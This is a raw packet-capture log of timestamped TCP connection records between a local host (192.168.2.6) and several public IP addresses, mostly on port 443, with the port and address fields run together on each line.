      Sep 27, 2024 04:26:39.799122095 CEST49716443192.168.2.6151.101.129.229
      Sep 27, 2024 04:26:39.799424887 CEST443497173.70.101.28192.168.2.6
      Sep 27, 2024 04:26:39.799546957 CEST443497173.70.101.28192.168.2.6
      Sep 27, 2024 04:26:39.799591064 CEST49717443192.168.2.63.70.101.28
      Sep 27, 2024 04:26:39.819489002 CEST49717443192.168.2.63.70.101.28
      Sep 27, 2024 04:26:39.819509029 CEST443497173.70.101.28192.168.2.6
      Sep 27, 2024 04:26:39.822555065 CEST49728443192.168.2.635.186.247.156
      Sep 27, 2024 04:26:39.822570086 CEST4434972835.186.247.156192.168.2.6
      Sep 27, 2024 04:26:39.845561981 CEST44349716151.101.129.229192.168.2.6
      Sep 27, 2024 04:26:39.845583916 CEST44349716151.101.129.229192.168.2.6
      Sep 27, 2024 04:26:39.845621109 CEST49716443192.168.2.6151.101.129.229
      Sep 27, 2024 04:26:39.845627069 CEST44349716151.101.129.229192.168.2.6
      Sep 27, 2024 04:26:39.845668077 CEST49716443192.168.2.6151.101.129.229
      Sep 27, 2024 04:26:39.867810011 CEST49728443192.168.2.635.186.247.156
      Sep 27, 2024 04:26:39.876482964 CEST44349716151.101.129.229192.168.2.6
      Sep 27, 2024 04:26:39.876503944 CEST44349716151.101.129.229192.168.2.6
      Sep 27, 2024 04:26:39.876559973 CEST49716443192.168.2.6151.101.129.229
      Sep 27, 2024 04:26:39.876569033 CEST44349716151.101.129.229192.168.2.6
      Sep 27, 2024 04:26:39.876605988 CEST49716443192.168.2.6151.101.129.229
      Sep 27, 2024 04:26:39.877566099 CEST44349716151.101.129.229192.168.2.6
      Sep 27, 2024 04:26:39.877585888 CEST44349716151.101.129.229192.168.2.6
      Sep 27, 2024 04:26:39.877615929 CEST49716443192.168.2.6151.101.129.229
      Sep 27, 2024 04:26:39.877621889 CEST44349716151.101.129.229192.168.2.6
      Sep 27, 2024 04:26:39.877662897 CEST49716443192.168.2.6151.101.129.229
      Sep 27, 2024 04:26:39.878567934 CEST44349716151.101.129.229192.168.2.6
      Sep 27, 2024 04:26:39.878588915 CEST44349716151.101.129.229192.168.2.6
      Sep 27, 2024 04:26:39.878617048 CEST49716443192.168.2.6151.101.129.229
      Sep 27, 2024 04:26:39.878623009 CEST44349716151.101.129.229192.168.2.6
      Sep 27, 2024 04:26:39.878662109 CEST49716443192.168.2.6151.101.129.229
      Sep 27, 2024 04:26:39.932095051 CEST44349716151.101.129.229192.168.2.6
      Sep 27, 2024 04:26:39.932126999 CEST44349716151.101.129.229192.168.2.6
      Sep 27, 2024 04:26:39.932173014 CEST49716443192.168.2.6151.101.129.229
      Sep 27, 2024 04:26:39.932185888 CEST44349716151.101.129.229192.168.2.6
      Sep 27, 2024 04:26:39.932235956 CEST49716443192.168.2.6151.101.129.229
      Sep 27, 2024 04:26:39.955462933 CEST44349729142.250.184.206192.168.2.6
      Sep 27, 2024 04:26:39.962025881 CEST44349716151.101.129.229192.168.2.6
      Sep 27, 2024 04:26:39.962074995 CEST44349716151.101.129.229192.168.2.6
      Sep 27, 2024 04:26:39.962106943 CEST49716443192.168.2.6151.101.129.229
      Sep 27, 2024 04:26:39.962126970 CEST44349716151.101.129.229192.168.2.6
      Sep 27, 2024 04:26:39.962162018 CEST49716443192.168.2.6151.101.129.229
      Sep 27, 2024 04:26:39.962176085 CEST49716443192.168.2.6151.101.129.229
      Sep 27, 2024 04:26:39.962182045 CEST44349716151.101.129.229192.168.2.6
      Sep 27, 2024 04:26:39.962260962 CEST44349716151.101.129.229192.168.2.6
      Sep 27, 2024 04:26:39.962311983 CEST49716443192.168.2.6151.101.129.229
      Sep 27, 2024 04:26:39.981950045 CEST44349730172.217.18.4192.168.2.6
      Sep 27, 2024 04:26:40.011364937 CEST49729443192.168.2.6142.250.184.206
      Sep 27, 2024 04:26:40.024169922 CEST49730443192.168.2.6172.217.18.4
      Sep 27, 2024 04:26:40.083137989 CEST49729443192.168.2.6142.250.184.206
      Sep 27, 2024 04:26:40.083162069 CEST44349729142.250.184.206192.168.2.6
      Sep 27, 2024 04:26:40.085019112 CEST44349729142.250.184.206192.168.2.6
      Sep 27, 2024 04:26:40.085057020 CEST44349729142.250.184.206192.168.2.6
      Sep 27, 2024 04:26:40.085086107 CEST49729443192.168.2.6142.250.184.206
      Sep 27, 2024 04:26:40.087580919 CEST44349729142.250.184.206192.168.2.6
      Sep 27, 2024 04:26:40.087634087 CEST49729443192.168.2.6142.250.184.206
      Sep 27, 2024 04:26:40.087646008 CEST44349729142.250.184.206192.168.2.6
      Sep 27, 2024 04:26:40.092278004 CEST49730443192.168.2.6172.217.18.4
      Sep 27, 2024 04:26:40.092293024 CEST44349730172.217.18.4192.168.2.6
      Sep 27, 2024 04:26:40.093756914 CEST44349730172.217.18.4192.168.2.6
      Sep 27, 2024 04:26:40.093775034 CEST44349730172.217.18.4192.168.2.6
      Sep 27, 2024 04:26:40.093815088 CEST49730443192.168.2.6172.217.18.4
      Sep 27, 2024 04:26:40.095777035 CEST49729443192.168.2.6142.250.184.206
      Sep 27, 2024 04:26:40.095968962 CEST44349729142.250.184.206192.168.2.6
      Sep 27, 2024 04:26:40.097074032 CEST49730443192.168.2.6172.217.18.4
      Sep 27, 2024 04:26:40.097174883 CEST44349730172.217.18.4192.168.2.6
      Sep 27, 2024 04:26:40.149573088 CEST49729443192.168.2.6142.250.184.206
      Sep 27, 2024 04:26:40.149575949 CEST49730443192.168.2.6172.217.18.4
      Sep 27, 2024 04:26:40.149590015 CEST44349729142.250.184.206192.168.2.6
      Sep 27, 2024 04:26:40.149590015 CEST44349730172.217.18.4192.168.2.6
      Sep 27, 2024 04:26:40.195971012 CEST49729443192.168.2.6142.250.184.206
      Sep 27, 2024 04:26:40.195975065 CEST49730443192.168.2.6172.217.18.4
      Sep 27, 2024 04:26:40.217752934 CEST49716443192.168.2.6151.101.129.229
      Sep 27, 2024 04:26:40.217777967 CEST44349716151.101.129.229192.168.2.6
      Sep 27, 2024 04:26:40.255633116 CEST44349732188.114.96.3192.168.2.6
      Sep 27, 2024 04:26:40.307147980 CEST49732443192.168.2.6188.114.96.3
      Sep 27, 2024 04:26:40.312824011 CEST49732443192.168.2.6188.114.96.3
      Sep 27, 2024 04:26:40.312844992 CEST44349732188.114.96.3192.168.2.6
      Sep 27, 2024 04:26:40.313935041 CEST44349732188.114.96.3192.168.2.6
      Sep 27, 2024 04:26:40.313947916 CEST44349732188.114.96.3192.168.2.6
      Sep 27, 2024 04:26:40.313993931 CEST49732443192.168.2.6188.114.96.3
      Sep 27, 2024 04:26:40.505467892 CEST49732443192.168.2.6188.114.96.3
      Sep 27, 2024 04:26:40.505676031 CEST44349732188.114.96.3192.168.2.6
      Sep 27, 2024 04:26:40.555335999 CEST49732443192.168.2.6188.114.96.3
      Sep 27, 2024 04:26:40.555366993 CEST44349732188.114.96.3192.168.2.6
      Sep 27, 2024 04:26:40.587997913 CEST49733443192.168.2.6151.101.129.229
      Sep 27, 2024 04:26:40.588047981 CEST44349733151.101.129.229192.168.2.6
      Sep 27, 2024 04:26:40.588103056 CEST49733443192.168.2.6151.101.129.229
      Sep 27, 2024 04:26:40.591278076 CEST49733443192.168.2.6151.101.129.229
      Sep 27, 2024 04:26:40.591289997 CEST44349733151.101.129.229192.168.2.6
      Sep 27, 2024 04:26:40.598473072 CEST49732443192.168.2.6188.114.96.3
      Sep 27, 2024 04:26:40.625130892 CEST49734443192.168.2.6151.101.129.229
      Sep 27, 2024 04:26:40.625149965 CEST44349734151.101.129.229192.168.2.6
      Sep 27, 2024 04:26:40.625211000 CEST49734443192.168.2.6151.101.129.229
      Sep 27, 2024 04:26:40.625943899 CEST49734443192.168.2.6151.101.129.229
      Sep 27, 2024 04:26:40.625955105 CEST44349734151.101.129.229192.168.2.6
      Sep 27, 2024 04:26:40.778033972 CEST49735443192.168.2.6184.28.90.27
      Sep 27, 2024 04:26:40.778090000 CEST44349735184.28.90.27192.168.2.6
      Sep 27, 2024 04:26:40.778176069 CEST49735443192.168.2.6184.28.90.27
      Sep 27, 2024 04:26:40.780033112 CEST49735443192.168.2.6184.28.90.27
      Sep 27, 2024 04:26:40.780056000 CEST44349735184.28.90.27192.168.2.6
      Sep 27, 2024 04:26:41.050261021 CEST44349733151.101.129.229192.168.2.6
      Sep 27, 2024 04:26:41.050621033 CEST49733443192.168.2.6151.101.129.229
      Sep 27, 2024 04:26:41.050647020 CEST44349733151.101.129.229192.168.2.6
      Sep 27, 2024 04:26:41.050995111 CEST44349733151.101.129.229192.168.2.6
      Sep 27, 2024 04:26:41.051326036 CEST49733443192.168.2.6151.101.129.229
      Sep 27, 2024 04:26:41.051373005 CEST44349733151.101.129.229192.168.2.6
      Sep 27, 2024 04:26:41.051495075 CEST49733443192.168.2.6151.101.129.229
      Sep 27, 2024 04:26:41.089381933 CEST44349734151.101.129.229192.168.2.6
      Sep 27, 2024 04:26:41.089672089 CEST49734443192.168.2.6151.101.129.229
      Sep 27, 2024 04:26:41.089699984 CEST44349734151.101.129.229192.168.2.6
      Sep 27, 2024 04:26:41.090166092 CEST44349734151.101.129.229192.168.2.6
      Sep 27, 2024 04:26:41.090817928 CEST49734443192.168.2.6151.101.129.229
      Sep 27, 2024 04:26:41.090909004 CEST44349734151.101.129.229192.168.2.6
      Sep 27, 2024 04:26:41.091094017 CEST49734443192.168.2.6151.101.129.229
      Sep 27, 2024 04:26:41.095402002 CEST44349733151.101.129.229192.168.2.6
      Sep 27, 2024 04:26:41.131445885 CEST44349734151.101.129.229192.168.2.6
      Sep 27, 2024 04:26:41.150506973 CEST44349733151.101.129.229192.168.2.6
      Sep 27, 2024 04:26:41.150557995 CEST44349733151.101.129.229192.168.2.6
      Sep 27, 2024 04:26:41.150582075 CEST44349733151.101.129.229192.168.2.6
      Sep 27, 2024 04:26:41.150640011 CEST49733443192.168.2.6151.101.129.229
      Sep 27, 2024 04:26:41.150651932 CEST44349733151.101.129.229192.168.2.6
      Sep 27, 2024 04:26:41.150686026 CEST44349733151.101.129.229192.168.2.6
      Sep 27, 2024 04:26:41.150700092 CEST49733443192.168.2.6151.101.129.229
      Sep 27, 2024 04:26:41.150728941 CEST49733443192.168.2.6151.101.129.229
      Sep 27, 2024 04:26:41.151484966 CEST49733443192.168.2.6151.101.129.229
      Sep 27, 2024 04:26:41.151499033 CEST44349733151.101.129.229192.168.2.6
      Sep 27, 2024 04:26:41.193257093 CEST44349734151.101.129.229192.168.2.6
      Sep 27, 2024 04:26:41.193414927 CEST44349734151.101.129.229192.168.2.6
      Sep 27, 2024 04:26:41.193490028 CEST49734443192.168.2.6151.101.129.229
      Sep 27, 2024 04:26:41.420495987 CEST44349735184.28.90.27192.168.2.6
      Sep 27, 2024 04:26:41.420599937 CEST49735443192.168.2.6184.28.90.27
      Sep 27, 2024 04:26:41.585285902 CEST49734443192.168.2.6151.101.129.229
      Sep 27, 2024 04:26:41.585330009 CEST44349734151.101.129.229192.168.2.6
      Sep 27, 2024 04:26:41.942550898 CEST49735443192.168.2.6184.28.90.27
      Sep 27, 2024 04:26:41.942585945 CEST44349735184.28.90.27192.168.2.6
      Sep 27, 2024 04:26:41.942851067 CEST44349735184.28.90.27192.168.2.6
      Sep 27, 2024 04:26:41.982918978 CEST49735443192.168.2.6184.28.90.27
      Sep 27, 2024 04:26:42.010957956 CEST804970452.58.254.253192.168.2.6
      Sep 27, 2024 04:26:42.011053085 CEST4970480192.168.2.652.58.254.253
      Sep 27, 2024 04:26:42.560520887 CEST4970480192.168.2.652.58.254.253
      Sep 27, 2024 04:26:42.565370083 CEST804970452.58.254.253192.168.2.6
      Sep 27, 2024 04:26:42.655033112 CEST49735443192.168.2.6184.28.90.27
      Sep 27, 2024 04:26:42.687088013 CEST49737443192.168.2.6104.17.24.14
      Sep 27, 2024 04:26:42.687110901 CEST44349737104.17.24.14192.168.2.6
      Sep 27, 2024 04:26:42.687252045 CEST49737443192.168.2.6104.17.24.14
      Sep 27, 2024 04:26:42.689445019 CEST49737443192.168.2.6104.17.24.14
      Sep 27, 2024 04:26:42.689457893 CEST44349737104.17.24.14192.168.2.6
      Sep 27, 2024 04:26:42.694189072 CEST49740443192.168.2.6162.19.58.156
      Sep 27, 2024 04:26:42.694195032 CEST44349740162.19.58.156192.168.2.6
      Sep 27, 2024 04:26:42.694293976 CEST49740443192.168.2.6162.19.58.156
      Sep 27, 2024 04:26:42.694855928 CEST49741443192.168.2.6162.19.58.156
      Sep 27, 2024 04:26:42.694869041 CEST44349741162.19.58.156192.168.2.6
      Sep 27, 2024 04:26:42.694935083 CEST49741443192.168.2.6162.19.58.156
      Sep 27, 2024 04:26:42.695374012 CEST49742443192.168.2.6162.19.58.156
      Sep 27, 2024 04:26:42.695393085 CEST44349742162.19.58.156192.168.2.6
      Sep 27, 2024 04:26:42.695435047 CEST44349735184.28.90.27192.168.2.6
      Sep 27, 2024 04:26:42.695491076 CEST49742443192.168.2.6162.19.58.156
      Sep 27, 2024 04:26:42.696120024 CEST49742443192.168.2.6162.19.58.156
      Sep 27, 2024 04:26:42.696131945 CEST44349742162.19.58.156192.168.2.6
      Sep 27, 2024 04:26:42.741740942 CEST49741443192.168.2.6162.19.58.156
      Sep 27, 2024 04:26:42.741766930 CEST44349741162.19.58.156192.168.2.6
      Sep 27, 2024 04:26:42.743139029 CEST49740443192.168.2.6162.19.58.156
      Sep 27, 2024 04:26:42.743150949 CEST44349740162.19.58.156192.168.2.6
      Sep 27, 2024 04:26:42.757224083 CEST49743443192.168.2.63.72.140.173
      Sep 27, 2024 04:26:42.757241011 CEST443497433.72.140.173192.168.2.6
      Sep 27, 2024 04:26:42.757309914 CEST49743443192.168.2.63.72.140.173
      Sep 27, 2024 04:26:42.757647038 CEST49743443192.168.2.63.72.140.173
      Sep 27, 2024 04:26:42.757659912 CEST443497433.72.140.173192.168.2.6
      Sep 27, 2024 04:26:42.842160940 CEST44349735184.28.90.27192.168.2.6
      Sep 27, 2024 04:26:42.842206955 CEST44349735184.28.90.27192.168.2.6
      Sep 27, 2024 04:26:42.842302084 CEST49735443192.168.2.6184.28.90.27
      Sep 27, 2024 04:26:42.842852116 CEST49735443192.168.2.6184.28.90.27
      Sep 27, 2024 04:26:42.842895031 CEST44349735184.28.90.27192.168.2.6
      Sep 27, 2024 04:26:42.842924118 CEST49735443192.168.2.6184.28.90.27
      Sep 27, 2024 04:26:42.842948914 CEST44349735184.28.90.27192.168.2.6
      Sep 27, 2024 04:26:42.908405066 CEST49747443192.168.2.6184.28.90.27
      Sep 27, 2024 04:26:42.908425093 CEST44349747184.28.90.27192.168.2.6
      Sep 27, 2024 04:26:42.908598900 CEST49747443192.168.2.6184.28.90.27
      Sep 27, 2024 04:26:42.910662889 CEST49747443192.168.2.6184.28.90.27
      Sep 27, 2024 04:26:42.910676956 CEST44349747184.28.90.27192.168.2.6
      Sep 27, 2024 04:26:43.141943932 CEST44349737104.17.24.14192.168.2.6
      Sep 27, 2024 04:26:43.142249107 CEST49737443192.168.2.6104.17.24.14
      Sep 27, 2024 04:26:43.142262936 CEST44349737104.17.24.14192.168.2.6
      Sep 27, 2024 04:26:43.143409014 CEST44349737104.17.24.14192.168.2.6
      Sep 27, 2024 04:26:43.143475056 CEST49737443192.168.2.6104.17.24.14
      Sep 27, 2024 04:26:43.143877029 CEST49737443192.168.2.6104.17.24.14
      Sep 27, 2024 04:26:43.143996000 CEST44349737104.17.24.14192.168.2.6
      Sep 27, 2024 04:26:43.144052029 CEST49737443192.168.2.6104.17.24.14
      Sep 27, 2024 04:26:43.187431097 CEST44349737104.17.24.14192.168.2.6
      Sep 27, 2024 04:26:43.195801020 CEST49737443192.168.2.6104.17.24.14
      Sep 27, 2024 04:26:43.195816994 CEST44349737104.17.24.14192.168.2.6
      Sep 27, 2024 04:26:43.241766930 CEST49737443192.168.2.6104.17.24.14
      Sep 27, 2024 04:26:43.290450096 CEST44349737104.17.24.14192.168.2.6
      Sep 27, 2024 04:26:43.290502071 CEST44349737104.17.24.14192.168.2.6
      Sep 27, 2024 04:26:43.290535927 CEST44349737104.17.24.14192.168.2.6
      Sep 27, 2024 04:26:43.290545940 CEST49737443192.168.2.6104.17.24.14
      Sep 27, 2024 04:26:43.290564060 CEST44349737104.17.24.14192.168.2.6
      Sep 27, 2024 04:26:43.290602922 CEST49737443192.168.2.6104.17.24.14
      Sep 27, 2024 04:26:43.290607929 CEST44349737104.17.24.14192.168.2.6
      Sep 27, 2024 04:26:43.290965080 CEST44349737104.17.24.14192.168.2.6
      Sep 27, 2024 04:26:43.290999889 CEST44349737104.17.24.14192.168.2.6
      Sep 27, 2024 04:26:43.291029930 CEST44349737104.17.24.14192.168.2.6
      Sep 27, 2024 04:26:43.291038990 CEST49737443192.168.2.6104.17.24.14
      Sep 27, 2024 04:26:43.291045904 CEST44349737104.17.24.14192.168.2.6
      Sep 27, 2024 04:26:43.291068077 CEST49737443192.168.2.6104.17.24.14
      Sep 27, 2024 04:26:43.295221090 CEST44349737104.17.24.14192.168.2.6
      Sep 27, 2024 04:26:43.295267105 CEST44349737104.17.24.14192.168.2.6
      Sep 27, 2024 04:26:43.295310020 CEST49737443192.168.2.6104.17.24.14
      Sep 27, 2024 04:26:43.295316935 CEST44349737104.17.24.14192.168.2.6
      Sep 27, 2024 04:26:43.295353889 CEST49737443192.168.2.6104.17.24.14
      Sep 27, 2024 04:26:43.313971043 CEST44349742162.19.58.156192.168.2.6
      Sep 27, 2024 04:26:43.314229012 CEST49742443192.168.2.6162.19.58.156
      Sep 27, 2024 04:26:43.314239979 CEST44349742162.19.58.156192.168.2.6
      Sep 27, 2024 04:26:43.317420959 CEST44349742162.19.58.156192.168.2.6
      Sep 27, 2024 04:26:43.317485094 CEST49742443192.168.2.6162.19.58.156
      Sep 27, 2024 04:26:43.317847013 CEST49742443192.168.2.6162.19.58.156
      Sep 27, 2024 04:26:43.317924976 CEST44349742162.19.58.156192.168.2.6
      Sep 27, 2024 04:26:43.317995071 CEST49742443192.168.2.6162.19.58.156
      Sep 27, 2024 04:26:43.318001032 CEST44349742162.19.58.156192.168.2.6
      Sep 27, 2024 04:26:43.344815016 CEST44349740162.19.58.156192.168.2.6
      Sep 27, 2024 04:26:43.345098019 CEST49740443192.168.2.6162.19.58.156
      Sep 27, 2024 04:26:43.345108986 CEST44349740162.19.58.156192.168.2.6
      Sep 27, 2024 04:26:43.346528053 CEST44349740162.19.58.156192.168.2.6
      Sep 27, 2024 04:26:43.346601963 CEST49740443192.168.2.6162.19.58.156
      Sep 27, 2024 04:26:43.347096920 CEST49740443192.168.2.6162.19.58.156
      Sep 27, 2024 04:26:43.347171068 CEST44349740162.19.58.156192.168.2.6
      Sep 27, 2024 04:26:43.347291946 CEST49740443192.168.2.6162.19.58.156
      Sep 27, 2024 04:26:43.347297907 CEST44349740162.19.58.156192.168.2.6
      Sep 27, 2024 04:26:43.361745119 CEST44349741162.19.58.156192.168.2.6
      Sep 27, 2024 04:26:43.361989975 CEST49741443192.168.2.6162.19.58.156
      Sep 27, 2024 04:26:43.362003088 CEST44349741162.19.58.156192.168.2.6
      Sep 27, 2024 04:26:43.364768028 CEST44349741162.19.58.156192.168.2.6
      Sep 27, 2024 04:26:43.364837885 CEST49741443192.168.2.6162.19.58.156
      Sep 27, 2024 04:26:43.365276098 CEST49741443192.168.2.6162.19.58.156
      Sep 27, 2024 04:26:43.365358114 CEST44349741162.19.58.156192.168.2.6
      Sep 27, 2024 04:26:43.365514994 CEST49741443192.168.2.6162.19.58.156
      Sep 27, 2024 04:26:43.365523100 CEST44349741162.19.58.156192.168.2.6
      Sep 27, 2024 04:26:43.373917103 CEST49742443192.168.2.6162.19.58.156
      Sep 27, 2024 04:26:43.377465010 CEST44349737104.17.24.14192.168.2.6
      Sep 27, 2024 04:26:43.377515078 CEST44349737104.17.24.14192.168.2.6
      Sep 27, 2024 04:26:43.377546072 CEST44349737104.17.24.14192.168.2.6
      Sep 27, 2024 04:26:43.377562046 CEST49737443192.168.2.6104.17.24.14
      Sep 27, 2024 04:26:43.377576113 CEST44349737104.17.24.14192.168.2.6
      Sep 27, 2024 04:26:43.377585888 CEST44349737104.17.24.14192.168.2.6
      Sep 27, 2024 04:26:43.377624035 CEST49737443192.168.2.6104.17.24.14
      Sep 27, 2024 04:26:43.377855062 CEST44349737104.17.24.14192.168.2.6
      Sep 27, 2024 04:26:43.377899885 CEST49737443192.168.2.6104.17.24.14
      Sep 27, 2024 04:26:43.377909899 CEST44349737104.17.24.14192.168.2.6
      Sep 27, 2024 04:26:43.377978086 CEST44349737104.17.24.14192.168.2.6
      Sep 27, 2024 04:26:43.378061056 CEST49737443192.168.2.6104.17.24.14
      Sep 27, 2024 04:26:43.378066063 CEST44349737104.17.24.14192.168.2.6
      Sep 27, 2024 04:26:43.378654957 CEST44349737104.17.24.14192.168.2.6
      Sep 27, 2024 04:26:43.378686905 CEST44349737104.17.24.14192.168.2.6
      Sep 27, 2024 04:26:43.378704071 CEST49737443192.168.2.6104.17.24.14
      Sep 27, 2024 04:26:43.378714085 CEST44349737104.17.24.14192.168.2.6
      Sep 27, 2024 04:26:43.378750086 CEST44349737104.17.24.14192.168.2.6
      Sep 27, 2024 04:26:43.378786087 CEST44349737104.17.24.14192.168.2.6
      Sep 27, 2024 04:26:43.378799915 CEST49737443192.168.2.6104.17.24.14
      Sep 27, 2024 04:26:43.378808022 CEST44349737104.17.24.14192.168.2.6
      Sep 27, 2024 04:26:43.378818035 CEST49737443192.168.2.6104.17.24.14
      Sep 27, 2024 04:26:43.379580975 CEST44349737104.17.24.14192.168.2.6
      Sep 27, 2024 04:26:43.379612923 CEST44349737104.17.24.14192.168.2.6
      Sep 27, 2024 04:26:43.379645109 CEST44349737104.17.24.14192.168.2.6
      Sep 27, 2024 04:26:43.379663944 CEST49737443192.168.2.6104.17.24.14
      Sep 27, 2024 04:26:43.379669905 CEST44349737104.17.24.14192.168.2.6
      Sep 27, 2024 04:26:43.379694939 CEST49737443192.168.2.6104.17.24.14
      Sep 27, 2024 04:26:43.380472898 CEST44349737104.17.24.14192.168.2.6
      Sep 27, 2024 04:26:43.380506039 CEST44349737104.17.24.14192.168.2.6
      Sep 27, 2024 04:26:43.380513906 CEST49737443192.168.2.6104.17.24.14
      Sep 27, 2024 04:26:43.380520105 CEST44349737104.17.24.14192.168.2.6
      Sep 27, 2024 04:26:43.380561113 CEST49737443192.168.2.6104.17.24.14
      Sep 27, 2024 04:26:43.380567074 CEST44349737104.17.24.14192.168.2.6
      Sep 27, 2024 04:26:43.405787945 CEST443497433.72.140.173192.168.2.6
      Sep 27, 2024 04:26:43.413400888 CEST49741443192.168.2.6162.19.58.156
      Sep 27, 2024 04:26:43.439503908 CEST49737443192.168.2.6104.17.24.14
      Sep 27, 2024 04:26:43.452533960 CEST49743443192.168.2.63.72.140.173
      Sep 27, 2024 04:26:43.463937044 CEST44349737104.17.24.14192.168.2.6
      Sep 27, 2024 04:26:43.464032888 CEST44349737104.17.24.14192.168.2.6
      Sep 27, 2024 04:26:43.464065075 CEST44349737104.17.24.14192.168.2.6
      Sep 27, 2024 04:26:43.464096069 CEST44349737104.17.24.14192.168.2.6
      Sep 27, 2024 04:26:43.464112997 CEST49737443192.168.2.6104.17.24.14
      Sep 27, 2024 04:26:43.464123011 CEST44349737104.17.24.14192.168.2.6
      Sep 27, 2024 04:26:43.464133978 CEST49737443192.168.2.6104.17.24.14
      Sep 27, 2024 04:26:43.464875937 CEST44349737104.17.24.14192.168.2.6
      Sep 27, 2024 04:26:43.464910984 CEST44349737104.17.24.14192.168.2.6
      Sep 27, 2024 04:26:43.464919090 CEST44349737104.17.24.14192.168.2.6
      Sep 27, 2024 04:26:43.464926958 CEST49737443192.168.2.6104.17.24.14
      Sep 27, 2024 04:26:43.464940071 CEST44349737104.17.24.14192.168.2.6
      Sep 27, 2024 04:26:43.464966059 CEST49737443192.168.2.6104.17.24.14
      Sep 27, 2024 04:26:43.464988947 CEST49737443192.168.2.6104.17.24.14
      Sep 27, 2024 04:26:43.465559959 CEST44349737104.17.24.14192.168.2.6
      Sep 27, 2024 04:26:43.465611935 CEST49737443192.168.2.6104.17.24.14
      Sep 27, 2024 04:26:43.465619087 CEST44349737104.17.24.14192.168.2.6
      Sep 27, 2024 04:26:43.465627909 CEST44349737104.17.24.14192.168.2.6
      Sep 27, 2024 04:26:43.465656042 CEST49737443192.168.2.6104.17.24.14
      Sep 27, 2024 04:26:43.465662956 CEST44349737104.17.24.14192.168.2.6
      Sep 27, 2024 04:26:43.465682030 CEST49737443192.168.2.6104.17.24.14
      Sep 27, 2024 04:26:43.466507912 CEST44349737104.17.24.14192.168.2.6
      Sep 27, 2024 04:26:43.466550112 CEST44349737104.17.24.14192.168.2.6
      Sep 27, 2024 04:26:43.466556072 CEST49737443192.168.2.6104.17.24.14
      Sep 27, 2024 04:26:43.466562033 CEST44349737104.17.24.14192.168.2.6
      Sep 27, 2024 04:26:43.466612101 CEST49737443192.168.2.6104.17.24.14
      Sep 27, 2024 04:26:43.468581915 CEST44349737104.17.24.14192.168.2.6
      Sep 27, 2024 04:26:43.468620062 CEST44349737104.17.24.14192.168.2.6
      Sep 27, 2024 04:26:43.468641996 CEST49737443192.168.2.6104.17.24.14
      Sep 27, 2024 04:26:43.468647003 CEST44349737104.17.24.14192.168.2.6
      Sep 27, 2024 04:26:43.468666077 CEST44349737104.17.24.14192.168.2.6
      Sep 27, 2024 04:26:43.468672991 CEST49737443192.168.2.6104.17.24.14
      Sep 27, 2024 04:26:43.468715906 CEST49737443192.168.2.6104.17.24.14
      Sep 27, 2024 04:26:43.468720913 CEST44349737104.17.24.14192.168.2.6
      Sep 27, 2024 04:26:43.468760967 CEST49737443192.168.2.6104.17.24.14
      Sep 27, 2024 04:26:43.468765020 CEST44349737104.17.24.14192.168.2.6
      Sep 27, 2024 04:26:43.468799114 CEST44349737104.17.24.14192.168.2.6
      Sep 27, 2024 04:26:43.468848944 CEST49737443192.168.2.6104.17.24.14
      Sep 27, 2024 04:26:43.472707033 CEST49743443192.168.2.63.72.140.173
      Sep 27, 2024 04:26:43.472712040 CEST443497433.72.140.173192.168.2.6
      Sep 27, 2024 04:26:43.476351976 CEST443497433.72.140.173192.168.2.6
      Sep 27, 2024 04:26:43.476457119 CEST49743443192.168.2.63.72.140.173
      Sep 27, 2024 04:26:43.489649057 CEST49743443192.168.2.63.72.140.173
      Sep 27, 2024 04:26:43.489743948 CEST443497433.72.140.173192.168.2.6
      Sep 27, 2024 04:26:43.501770973 CEST49740443192.168.2.6162.19.58.156
      Sep 27, 2024 04:26:43.503982067 CEST49743443192.168.2.63.72.140.173
      Sep 27, 2024 04:26:43.503994942 CEST443497433.72.140.173192.168.2.6
      Sep 27, 2024 04:26:43.505774975 CEST49737443192.168.2.6104.17.24.14
      Sep 27, 2024 04:26:43.505789042 CEST44349737104.17.24.14192.168.2.6
      Sep 27, 2024 04:26:43.543719053 CEST44349747184.28.90.27192.168.2.6
      Sep 27, 2024 04:26:43.543811083 CEST49747443192.168.2.6184.28.90.27
      Sep 27, 2024 04:26:43.544883013 CEST49743443192.168.2.63.72.140.173
      Sep 27, 2024 04:26:43.565454006 CEST49747443192.168.2.6184.28.90.27
      Sep 27, 2024 04:26:43.565474033 CEST44349747184.28.90.27192.168.2.6
      Sep 27, 2024 04:26:43.565691948 CEST44349747184.28.90.27192.168.2.6
      Sep 27, 2024 04:26:43.568847895 CEST49747443192.168.2.6184.28.90.27
      Sep 27, 2024 04:26:43.611414909 CEST44349747184.28.90.27192.168.2.6
      Sep 27, 2024 04:26:43.686626911 CEST44349742162.19.58.156192.168.2.6
      Sep 27, 2024 04:26:43.686686993 CEST44349742162.19.58.156192.168.2.6
      Sep 27, 2024 04:26:43.686736107 CEST49742443192.168.2.6162.19.58.156
      Sep 27, 2024 04:26:43.686743021 CEST44349742162.19.58.156192.168.2.6
      Sep 27, 2024 04:26:43.687089920 CEST49742443192.168.2.6162.19.58.156
      Sep 27, 2024 04:26:43.699136019 CEST44349742162.19.58.156192.168.2.6
      Sep 27, 2024 04:26:43.699202061 CEST49742443192.168.2.6162.19.58.156
      Sep 27, 2024 04:26:43.708960056 CEST44349742162.19.58.156192.168.2.6
      Sep 27, 2024 04:26:43.709038019 CEST49742443192.168.2.6162.19.58.156
      Sep 27, 2024 04:26:43.713140965 CEST44349740162.19.58.156192.168.2.6
      Sep 27, 2024 04:26:43.713171005 CEST44349740162.19.58.156192.168.2.6
      Sep 27, 2024 04:26:43.713226080 CEST49740443192.168.2.6162.19.58.156
      Sep 27, 2024 04:26:43.713229895 CEST44349740162.19.58.156192.168.2.6
      Sep 27, 2024 04:26:43.714410067 CEST44349742162.19.58.156192.168.2.6
      Sep 27, 2024 04:26:43.714473963 CEST49742443192.168.2.6162.19.58.156
      Sep 27, 2024 04:26:43.714478970 CEST44349742162.19.58.156192.168.2.6
      Sep 27, 2024 04:26:43.714507103 CEST49740443192.168.2.6162.19.58.156
      Sep 27, 2024 04:26:43.714523077 CEST49742443192.168.2.6162.19.58.156
      Sep 27, 2024 04:26:43.714555979 CEST44349742162.19.58.156192.168.2.6
      Sep 27, 2024 04:26:43.716728926 CEST49742443192.168.2.6162.19.58.156
      Sep 27, 2024 04:26:43.725107908 CEST44349740162.19.58.156192.168.2.6
      Sep 27, 2024 04:26:43.725117922 CEST44349740162.19.58.156192.168.2.6
      Sep 27, 2024 04:26:43.725188971 CEST49740443192.168.2.6162.19.58.156
      Sep 27, 2024 04:26:43.731535912 CEST44349741162.19.58.156192.168.2.6
      Sep 27, 2024 04:26:43.731606007 CEST44349741162.19.58.156192.168.2.6
